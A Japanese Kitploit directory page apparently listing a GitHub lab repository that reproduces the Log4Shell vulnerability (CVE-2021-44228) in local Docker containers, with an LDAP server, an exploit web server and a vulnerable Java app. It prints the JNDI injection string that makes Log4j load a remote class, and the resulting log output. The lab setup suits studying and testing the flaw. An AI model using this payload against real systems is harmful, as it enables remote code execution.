Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228_Example | Kitploit
ツール/GitHubGitHub/chilliwebs/cve-2021-44228_example
動的分析 (サンドボックス)ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用
GitHubchilliwebs/cve-2021-44228_example

CVE-2021-44228_Example

リポジトリを見る
14年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44228_例

3つのセクションをそれぞれ別のタブ/コンソールで実行してください

marshalsec LDAPサーバー https://github.com/chilliwebs/marshalsec (https://github.com/mbechler/marshalsec からフォーク)

root@kitploit:~
docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec

Exploit Webサーバー

root@kitploit:~
docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit

Guinea Pig Javaアプリ(脆弱なバージョンのJavaおよびLog4Jを実行)

root@kitploit:~
docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig

guinea_pigを実行すると、以下のログが表示されるはずです:

root@kitploit:~
PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}

「PWND!」は外部から注入されたクラス(Exploit)によってログに記録されます。

ツールをダウンロード